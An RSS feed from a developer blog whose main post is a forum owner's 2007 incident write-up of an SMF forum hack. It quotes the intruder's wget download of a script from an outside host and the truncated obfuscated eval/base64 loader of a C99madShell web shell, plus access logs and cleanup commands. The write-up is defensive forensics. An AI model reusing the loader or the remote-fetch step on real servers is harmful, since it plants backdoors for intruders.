<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>DeveloperSide.NET Blog &#187; phpBB</title>
	<atom:link href="http://www.devside.net/blog/tag/phpbb/feed" rel="self" type="application/rss+xml" />
	<link>http://www.devside.net/blog</link>
	<description>Linux, Windows, MacOS? Who cares. Just give me something that works!</description>
	<lastBuildDate>Fri, 07 May 2010 03:43:18 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>All Your SMF Forums Have Been Hacked. Have a Nice Day.</title>
		<link>http://www.devside.net/blog/smf-exploit-like-phpbb-hack</link>
		<comments>http://www.devside.net/blog/smf-exploit-like-phpbb-hack#comments</comments>
		<pubDate>Sat, 29 Sep 2007 13:52:58 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Hack]]></category>
		<category><![CDATA[SMF]]></category>
		<category><![CDATA[phpBB]]></category>

		<guid isPermaLink="false">http://www.devside.net/blog/smf-exploit-like-phpbb-hack</guid>
		<description><![CDATA[There is nothing quite like innocently checking over your httpd logs, attempting to figure out why the &#8216;preview&#8217; feature of your forum s/w has stopped working [stuck on 'fetching preview...'], only to come up to this&#8230;

1
2
3
4
5
6
7
8
9
10
--09:57:23--  http://kotzilla.jino-net.ru/include.txt
           =&#62; `include.txt'
Resolving kotzilla.jino-net.ru... 217.107.217.29
Connecting to kotzilla.jino-net.ru&#124;217.107.217.29&#124;:80... connected.
HTTP [...]]]></description>
			<content:encoded><![CDATA[<p>There is nothing quite like innocently checking over your httpd logs, attempting to figure out why the &#8216;preview&#8217; feature of your forum s/w has stopped working [stuck on 'fetching preview...'], only to come up to this&#8230;</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
</pre></td><td class="code"><pre class="bash" style="font-family:monospace;">--09:<span style="color: #000000;">57</span>:<span style="color: #000000;">23</span>--  http:<span style="color: #000000; font-weight: bold;">//</span>kotzilla.jino-net.ru<span style="color: #000000; font-weight: bold;">/</span>include.txt
           =<span style="color: #000000; font-weight: bold;">&gt;</span> <span style="color: #000000; font-weight: bold;">`</span>include.txt<span style="color: #ff0000;">'
Resolving kotzilla.jino-net.ru... 217.107.217.29
Connecting to kotzilla.jino-net.ru|217.107.217.29|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 44,348 (43K) [text/plain]
&nbsp;
    0K .......... .......... .......... .......... ...       100%   69.60 KB/s
&nbsp;
09:57:25 (69.60 KB/s) - `include.txt'</span> saved <span style="color: #7a0874; font-weight: bold;">&#91;</span><span style="color: #000000;">44348</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">44348</span><span style="color: #7a0874; font-weight: bold;">&#93;</span></pre></td></tr></table></div>

<p>For those that do not know, the above translates to using wget, or the equivalent, to download a script to your system. With all this being done via Apache and usually from a simple URL designed to exploit a weakness in the given application.</p>
<p>My journey starts here.</p>
<p><strong>Step 1.</strong></p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
</pre></td><td class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">find</span> <span style="color: #000000; font-weight: bold;">/</span> <span style="color: #660033;">-name</span> include.txt</pre></td></tr></table></div>

<p>Nothing. Intruder must have deleted or renamed it.</p>
<p><strong>Step 2.</strong><br />
Check http://kotzilla.jino-net.ru/include.txt for clues.</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
</pre></td><td class="code"><pre class="php" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">&lt;?PHP</span>
             <span style="color: #666666; font-style: italic;">//Authentication</span>
<span style="color: #000088;">$login</span> <span style="color: #339933;">=</span> <span style="color: #0000ff;">&quot;&quot;</span><span style="color: #339933;">;</span> <span style="color: #666666; font-style: italic;">//Login</span>
<span style="color: #000088;">$pass</span> <span style="color: #339933;">=</span> <span style="color: #0000ff;">&quot;&quot;</span><span style="color: #339933;">;</span>  <span style="color: #666666; font-style: italic;">//Pass</span>
<span style="color: #000088;">$md5_pass</span> <span style="color: #339933;">=</span> <span style="color: #0000ff;">&quot;&quot;</span><span style="color: #339933;">;</span> <span style="color: #666666; font-style: italic;">//If no pass then hash</span>
<span style="color: #990000;">eval</span><span style="color: #009900;">&#40;</span><span style="color: #990000;">gzinflate</span><span style="color: #009900;">&#40;</span><span style="color: #990000;">base64_decode</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'HJ3HkqN..[removed]..f/79z/8A'</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #000000; font-weight: bold;">?&gt;</span></pre></td></tr></table></div>

<p>Intruder must think this is clever. Once you decode and inflate the string, it returns&#8230;</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
</pre></td><td class="code"><pre class="php" style="font-family:monospace;"><span style="color: #990000;">eval</span><span style="color: #009900;">&#40;</span><span style="color: #990000;">gzinflate</span><span style="color: #009900;">&#40;</span><span style="color: #990000;">base64_decode</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'[another string to decode and inflate]'</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></pre></td></tr></table></div>

<p><strong>Step 3.</strong><br />
We do not want to execute any PHP code that is an unknown. The only option left is to write a PHP script to decode/inflate until we get at the center&#8230;</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
</pre></td><td class="code"><pre class="php" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">&lt;?php</span>
<span style="color: #000088;">$string</span> <span style="color: #339933;">=</span> <span style="color: #0000ff;">&quot;eval(gzinflate(base64_decode('HJ3HkqN..[removed]..f/79z/8A')));&quot;</span><span style="color: #339933;">;</span>
<span style="color: #000088;">$pattern</span> <span style="color: #339933;">=</span> <span style="color: #0000ff;">'/^eval\(gzinflate\(base64_decode\('</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#91;</span>^<span style="color: #0000ff;">'\);]*)/'</span><span style="color: #339933;">;</span>
<span style="color: #000088;">$count</span> <span style="color: #339933;">=</span> <span style="color: #cc66cc;">0</span><span style="color: #339933;">;</span>
<span style="color: #b1b100;">while</span> <span style="color: #009900;">&#40;</span><span style="color: #990000;">preg_match</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$pattern</span><span style="color: #339933;">,</span> <span style="color: #000088;">$string</span><span style="color: #339933;">,</span> <span style="color: #000088;">$matches</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#41;</span>
<span style="color: #009900;">&#123;</span>
<span style="color: #000088;">$count</span><span style="color: #339933;">++;</span>
<span style="color: #000088;">$string</span> <span style="color: #339933;">=</span> <span style="color: #990000;">gzinflate</span><span style="color: #009900;">&#40;</span><span style="color: #990000;">base64_decode</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$matches</span><span style="color: #009900;">&#91;</span><span style="color: #cc66cc;">1</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span>
<span style="color: #b1b100;">echo</span> <span style="color: #0000ff;">&quot;Decoded/Inflated:<span style="color: #006699; font-weight: bold;">$count</span><span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">;</span>
<span style="color: #b1b100;">echo</span> <span style="color: #0000ff;">&quot;<span style="color: #006699; font-weight: bold;">$string</span>&quot;</span><span style="color: #339933;">;</span>
<span style="color: #000000; font-weight: bold;">?&gt;</span></pre></td></tr></table></div>

<p>Seems to be some type of a web php shell script called C99madShell.</p>
<p><strong>Step 4.</strong><br />
We need to locate the downloaded script&#8230;</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
</pre></td><td class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">find</span> <span style="color: #000000; font-weight: bold;">/</span> <span style="color: #660033;">-name</span> <span style="color: #ff0000;">'*.php'</span> <span style="color: #000000; font-weight: bold;">|</span> <span style="color: #c20cb9; font-weight: bold;">xargs</span> <span style="color: #c20cb9; font-weight: bold;">grep</span> <span style="color: #ff0000;">'eval(gzinflate(base64_decode('</span></pre></td></tr></table></div>


<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
</pre></td><td class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">/</span>...<span style="color: #000000; font-weight: bold;">/</span>forums.devside.net<span style="color: #000000; font-weight: bold;">/</span>Themes<span style="color: #000000; font-weight: bold;">/</span>readme.php:<span style="color: #7a0874; font-weight: bold;">eval</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>gzinflate<span style="color: #7a0874; font-weight: bold;">&#40;</span>base64_decode<span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #ff0000;">'HJ3Hkq...</span></pre></td></tr></table></div>

<p>Not good!</p>
<p><a href='http://www.devside.net/blog/wp-content/uploads/2007/09/c99sh_1_2.gif' title='Hack Shell 1'><img src='http://www.devside.net/blog/wp-content/uploads/2007/09/c99sh_1_2_425.gif' alt='Hack Shell 1' /></a></p>
<p><a href='http://www.devside.net/blog/wp-content/uploads/2007/09/c99sh_2_2.gif' title='Hack Shell 2'><img src='http://www.devside.net/blog/wp-content/uploads/2007/09/c99sh_2_2_425.gif' alt='Hack Shell 2' /></a></p>
<p><strong>Step 5.</strong><br />
Check logs.</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
</pre></td><td class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">grep</span> <span style="color: #ff0000;">'readme.php'</span> <span style="color: #000000; font-weight: bold;">/</span>...<span style="color: #000000; font-weight: bold;">/</span>forums.devside.net<span style="color: #000000; font-weight: bold;">/</span>access_log</pre></td></tr></table></div>

<p>Intruder was up to something no good.</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
</pre></td><td class="code"><pre class="bash" style="font-family:monospace;">149.156.204.1 - - <span style="color: #7a0874; font-weight: bold;">&#91;</span><span style="color: #000000;">26</span><span style="color: #000000; font-weight: bold;">/</span>Sep<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">2007</span>:09:<span style="color: #000000;">57</span>:<span style="color: #000000;">38</span> -0400<span style="color: #7a0874; font-weight: bold;">&#93;</span> <span style="color: #ff0000;">&quot;GET /Themes/readme.php HTTP/1.1&quot;</span> <span style="color: #000000;">200</span> <span style="color: #000000;">4374</span> <span style="color: #ff0000;">&quot;-&quot;</span> <span style="color: #ff0000;">&quot;Opera/9.21 (Windows NT 5.1; U; ru)&quot;</span>
149.156.204.1 - - <span style="color: #7a0874; font-weight: bold;">&#91;</span><span style="color: #000000;">26</span><span style="color: #000000; font-weight: bold;">/</span>Sep<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">2007</span>:09:<span style="color: #000000;">58</span>:00 -0400<span style="color: #7a0874; font-weight: bold;">&#93;</span> <span style="color: #ff0000;">&quot;POST /Themes/readme.php HTTP/1.1&quot;</span> <span style="color: #000000;">200</span> <span style="color: #000000;">3501</span> <span style="color: #ff0000;">&quot;http://forums.devside.net/Themes/readme.php&quot;</span> <span style="color: #ff0000;">&quot;Opera/9.21 (Windows NT 5.1; U; ru)&quot;</span>
149.156.204.1 - - <span style="color: #7a0874; font-weight: bold;">&#91;</span><span style="color: #000000;">27</span><span style="color: #000000; font-weight: bold;">/</span>Sep<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">2007</span>:<span style="color: #000000;">13</span>:08:03 -0400<span style="color: #7a0874; font-weight: bold;">&#93;</span> <span style="color: #ff0000;">&quot;GET /Themes/readme.php HTTP/1.1&quot;</span> <span style="color: #000000;">200</span> <span style="color: #000000;">4366</span> <span style="color: #ff0000;">&quot;-&quot;</span> <span style="color: #ff0000;">&quot;GoogleBotv2&quot;</span>
149.156.204.1 - - <span style="color: #7a0874; font-weight: bold;">&#91;</span><span style="color: #000000;">27</span><span style="color: #000000; font-weight: bold;">/</span>Sep<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">2007</span>:<span style="color: #000000;">13</span>:09:<span style="color: #000000;">24</span> -0400<span style="color: #7a0874; font-weight: bold;">&#93;</span> <span style="color: #ff0000;">&quot;POST /Themes/readme.php HTTP/1.1&quot;</span> <span style="color: #000000;">200</span> <span style="color: #000000;">4980</span> <span style="color: #ff0000;">&quot;http://forums.devside.net/Themes/readme.php&quot;</span> <span style="color: #ff0000;">&quot;GoogleBotv2&quot;</span>
...</pre></td></tr></table></div>

<p><strong>Final Analysis.</strong><br />
I&#8217;ve search the logs, and I cannot locate anything helpful about the exploit. It does not seem to be an exploit in a URL, maybe POST related, or has something to do with the SMF theme function. I run no mods, and use the default theme, and do not allow users to switch themes.</p>
<p>The latest SMF 1.1.4 changelog does not state anything about fixed exploits.</p>
<p>I know the IP of the intruder [I'm sure just a hijacked system], the user_id on the forum, the mail account used for activation, but not much anything else.</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
</pre></td><td class="code"><pre class="bash" style="font-family:monospace;">resolveip 149.156.204.1
Host name of 149.156.204.1 is nzs.agh.edu.pl</pre></td></tr></table></div>


<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
</pre></td><td class="code"><pre class="bash" style="font-family:monospace;">149.156.204.1 - - <span style="color: #7a0874; font-weight: bold;">&#91;</span><span style="color: #000000;">26</span><span style="color: #000000; font-weight: bold;">/</span>Sep<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">2007</span>:09:<span style="color: #000000;">52</span>:<span style="color: #000000;">58</span> -0400<span style="color: #7a0874; font-weight: bold;">&#93;</span> <span style="color: #ff0000;">&quot;GET /index.php?action=activate;u=1992;code=136bd7eb0f HTTP/1.1&quot;</span> <span style="color: #000000;">200</span> <span style="color: #000000;">3409</span> <span style="color: #ff0000;">&quot;http://www.qcsalabama.com/mail/src/
read_body.php?mailbox=INBOX&amp;passed_id=685&amp;startMessage=1&quot;</span> <span style="color: #ff0000;">&quot;Opera/9.21 (Windows NT 5.1; U; ru)&quot;</span></pre></td></tr></table></div>

<p>Checking the forum account, I see this user has also logged in via another IP [and this might be where the exploit starts]&#8230;</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
</pre></td><td class="code"><pre class="bash" style="font-family:monospace;">83.219.135.75 - - <span style="color: #7a0874; font-weight: bold;">&#91;</span><span style="color: #000000;">26</span><span style="color: #000000; font-weight: bold;">/</span>Sep<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">2007</span>:09:<span style="color: #000000;">48</span>:07 -0400<span style="color: #7a0874; font-weight: bold;">&#93;</span> <span style="color: #ff0000;">&quot;GET /index.php?action=register HTTP/1.1&quot;</span> <span style="color: #000000;">200</span> <span style="color: #000000;">5961</span> <span style="color: #ff0000;">&quot;http://www.google.com/search?num=100&amp;hl=en&amp;lr=&amp;as_qdr=all&amp;
q=+%22powered+by+smf+1.1.3%22+site%3Anet&amp;btnG=Search&quot;</span> <span style="color: #ff0000;">&quot;Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7&quot;</span>
...
83.219.135.75 - - <span style="color: #7a0874; font-weight: bold;">&#91;</span><span style="color: #000000;">26</span><span style="color: #000000; font-weight: bold;">/</span>Sep<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">2007</span>:09:<span style="color: #000000;">57</span>:07 -0400<span style="color: #7a0874; font-weight: bold;">&#93;</span> <span style="color: #ff0000;">&quot;POST //index.php?action=login2 HTTP/1.1&quot;</span> <span style="color: #000000;">302</span> <span style="color: #000000;">851</span> <span style="color: #ff0000;">&quot;-&quot;</span> <span style="color: #ff0000;">&quot;Mozilla/4.0 (compatible; Windows 5.1)&quot;</span>
83.219.135.75 - - <span style="color: #7a0874; font-weight: bold;">&#91;</span><span style="color: #000000;">26</span><span style="color: #000000; font-weight: bold;">/</span>Sep<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">2007</span>:09:<span style="color: #000000;">57</span>:09 -0400<span style="color: #7a0874; font-weight: bold;">&#93;</span> <span style="color: #ff0000;">&quot;POST /index.php?action=post2; HTTP/1.1&quot;</span> <span style="color: #000000;">200</span> <span style="color: #000000;">375</span> <span style="color: #ff0000;">&quot;-&quot;</span> <span style="color: #ff0000;">&quot;Mozilla/4.0 (compatible; Windows 5.1)&quot;</span>
83.219.135.75 - - <span style="color: #7a0874; font-weight: bold;">&#91;</span><span style="color: #000000;">26</span><span style="color: #000000; font-weight: bold;">/</span>Sep<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">2007</span>:09:<span style="color: #000000;">57</span>:<span style="color: #000000;">11</span> -0400<span style="color: #7a0874; font-weight: bold;">&#93;</span> <span style="color: #ff0000;">&quot;POST /index.php?action=post2; HTTP/1.1&quot;</span> <span style="color: #000000;">200</span> <span style="color: #000000;">1527</span> <span style="color: #ff0000;">&quot;-&quot;</span> <span style="color: #ff0000;">&quot;Mozilla/4.0 (compatible; Windows 5.1)&quot;</span>
83.219.135.75 - - <span style="color: #7a0874; font-weight: bold;">&#91;</span><span style="color: #000000;">26</span><span style="color: #000000; font-weight: bold;">/</span>Sep<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">2007</span>:09:<span style="color: #000000;">57</span>:<span style="color: #000000;">23</span> -0400<span style="color: #7a0874; font-weight: bold;">&#93;</span> <span style="color: #ff0000;">&quot;POST /index.php?action=post2; HTTP/1.1&quot;</span> <span style="color: #000000;">200</span> <span style="color: #000000;">307</span> <span style="color: #ff0000;">&quot;-&quot;</span> <span style="color: #ff0000;">&quot;Mozilla/4.0 (compatible; Windows 5.1)&quot;</span></pre></td></tr></table></div>


<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
</pre></td><td class="code"><pre class="bash" style="font-family:monospace;">resolveip 83.219.135.75
Host name of 83.219.135.75 is ppp135-75.tis-dialog.ru</pre></td></tr></table></div>

<p>I can understand phpBB getting rooted, I can understand WordPress being owned, but this is a first one for <a href="http://www.simplemachines.org/">SMF</a>.</p>
<p>And for anyone having odd issues with SMF [like getting stuck on 'fetching preview...']&#8230;</p>
<blockquote><p>Smile. All your SMF forums have been hacked. Have a nice day.</p></blockquote>
<p>Search <a href="http://www.simplemachines.org/community/index.php?action=search2;search=fetching+preview;brd[]=9">&#8216;fetching preview&#8217;</a> on the SMF support forums. This hack/exploit might be going back years.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.devside.net/blog/smf-exploit-like-phpbb-hack/feed</wfw:commentRss>
		<slash:comments>17</slash:comments>
		</item>
		<item>
		<title>phpBB is dead&#8230; long live phpBB!?</title>
		<link>http://www.devside.net/blog/phpbb-transfer</link>
		<comments>http://www.devside.net/blog/phpbb-transfer#comments</comments>
		<pubDate>Sat, 19 May 2007 12:57:48 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[phpBB]]></category>

		<guid isPermaLink="false">http://www.devside.net/blog/phpbb-transfer</guid>
		<description><![CDATA[Whoever created this headline got it exactly right.
phpBB is dead&#8230; long live phpBB!
In an not entirely unexpected email to the team, James &#8220;theFinn&#8221; Atkinson has, after a number of years inactivity even &#8220;behind the scenes&#8221; due to personal circumstance, has formally resigned as of the 30th of April, 2007.
The now newly independent phpBB still has [...]]]></description>
			<content:encoded><![CDATA[<p>Whoever created this headline got it exactly right.</p>
<p><a href="http://www.phpbb.com/community/viewtopic.php?f=14&#038;t=538301">phpBB is dead&#8230; long live phpBB!</a></p>
<blockquote><p>In an not entirely unexpected email to the team, James &#8220;theFinn&#8221; Atkinson has, after a number of years inactivity even &#8220;behind the scenes&#8221; due to personal circumstance, has formally resigned as of the 30th of April, 2007.</p>
<p>The now newly independent phpBB still has the same active contributors and will continue to support the stable phpBB 2.0.x and develop the next-generation phpBB 3.0.x, with James having already allowed the transfer of the www.phpBB.com domain for a majority share of the financial assets that have been generated by the project via advertising to date, so as to minimize disruption to phpBB&#8217;s users.</p></blockquote>
<p>A lot can be read between these lines&#8230;</p>
<p>For one, large sums of money are involved here. phpbb.com is a PR10/9 site and handles some serious traffic. And as the saying goes: more money, more problems.</p>
<p>Another is the restructuring of the &#8216;organization&#8217;&#8230; While new blood is always welcome, you do not want to lose the part of the team that has learned from making all the mistakes. Not unless you want to repeat your failures.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.devside.net/blog/phpbb-transfer/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Two years in the making, phpBB 3.0 [beta] is finaly out</title>
		<link>http://www.devside.net/blog/phpbb3-beta</link>
		<comments>http://www.devside.net/blog/phpbb3-beta#comments</comments>
		<pubDate>Mon, 19 Mar 2007 19:07:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[phpBB]]></category>

		<guid isPermaLink="false">http://www.devside.net/blog/phpbb3-beta</guid>
		<description><![CDATA[Let the spambots begin&#8230;
I&#8217;m not exactly sure if version 3.0 is a complete rewrite or just a somewhat incompatible branch, but one thing is certain, wait a while before upgrading.
phpBB v2 has been nothing but trouble.
You can preview the new and improved look at the phpBB Forums.
]]></description>
			<content:encoded><![CDATA[<p>Let the spambots begin&#8230;</p>
<p>I&#8217;m not exactly sure if version 3.0 is a complete rewrite or just a somewhat incompatible branch, but one thing is certain, wait a while before upgrading.</p>
<p>phpBB v2 has been nothing but trouble.</p>
<p>You can preview the new and improved look at the <a href="http://www.phpbb.com/community/">phpBB Forums</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.devside.net/blog/phpbb3-beta/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Switched from phpBB to SMF</title>
		<link>http://www.devside.net/blog/smf-switch-over</link>
		<comments>http://www.devside.net/blog/smf-switch-over#comments</comments>
		<pubDate>Wed, 03 Jan 2007 02:24:56 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[DeveloperSide.NET]]></category>
		<category><![CDATA[phpBB]]></category>

		<guid isPermaLink="false">http://www.devside.net/blog/smf-switch-over</guid>
		<description><![CDATA[All in all, I like it.
It generates valid html/css and has more administrative options than phpBB. Though in someways it does feel a bit more complicated to setup and use properly [keep in mind that *I have* been accustomed to using phpBB since 2003, and I did have to perform the extra steps of setting [...]]]></description>
			<content:encoded><![CDATA[<p>All in all, I like it.</p>
<p>It generates valid html/css and has more administrative options than phpBB. Though in someways it does feel a bit more complicated to setup and use properly [keep in mind that *I have* been accustomed to using phpBB since 2003, and I did have to perform the extra steps of setting everything up and converting the old forum db to SMF].</p>
<p>On the plus side, it is much more secure than the nightmare called &#8220;phpBB&#8221;; though I do not like the fact you have to chmod 777 all the files &#8212; or at least some subset. Nor the fact that SMF does not seem to have as large of a community base as phpBB, which translates into &#8220;good luck finding the info you require, or locating a solution to a problem.&#8221;</p>
<p>The biggest hassle right now is with losing all the old URLs that have been indexed, that have good SE positions&#8230;</p>
<p>Indexed phpBB URLs are primarily of a post number while SMF uses a system where you have to start with a thread number and only then can you work to the post number. And since I have no way of knowing the thread number, all I can do is redirect back to index.php.</p>
<p>I&#8217;m going to stick to the default theme as it has a very clean and simple look. One other theme that I liked was called &#8216;DilberMC&#8217;, with the light silver color and an 800px width.</p>
<p>And just as a note to anyone interested in SMF, while it is free software, it is not GPL. The licensing termed specifically prohibit you from distributing the software in any way, modified or not. All generated copyright notices must also be retained.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.devside.net/blog/smf-switch-over/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Forums, phpBB vs the Rest</title>
		<link>http://www.devside.net/blog/forums-guide</link>
		<comments>http://www.devside.net/blog/forums-guide#comments</comments>
		<pubDate>Thu, 28 Dec 2006 21:11:47 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[phpBB]]></category>

		<guid isPermaLink="false">http://www.devside.net/blog/fourms-guide</guid>
		<description><![CDATA[Having run phpBB for the last 3 years as the Forum s/w for devside.net, I have definitely come across issues and problems. Some very serious&#8230;
phpBB made it possible for devside.net to get hacked, has corrupted the db more than once with some damage, and is now mysteriously creating backups that are different in size by [...]]]></description>
			<content:encoded><![CDATA[<p>Having run phpBB for the last 3 years as the Forum s/w for devside.net, I have definitely come across issues and problems. Some very serious&#8230;</p>
<p>phpBB made it possible for devside.net to get hacked, has corrupted the db more than once with some damage, and is now mysteriously creating backups that are different in size by a large margin from the mysql db dumps [compression is taken into account], not to mention all the headaches it has given me.</p>
<p>Here is an article comparing the major Forums&#8230;<br />
<a href="http://shsc.info/ForumSoftwareGuide">http://shsc.info/ForumSoftwareGuide</a></p>
<p>I think when I have the time, I will try out SMF.</p>
<p>As a note, phpBB3 is coming out, and hopefully will be an improvement over the 2.0 branch. And if it is not&#8230; I will not be surprised at all.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.devside.net/blog/forums-guide/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
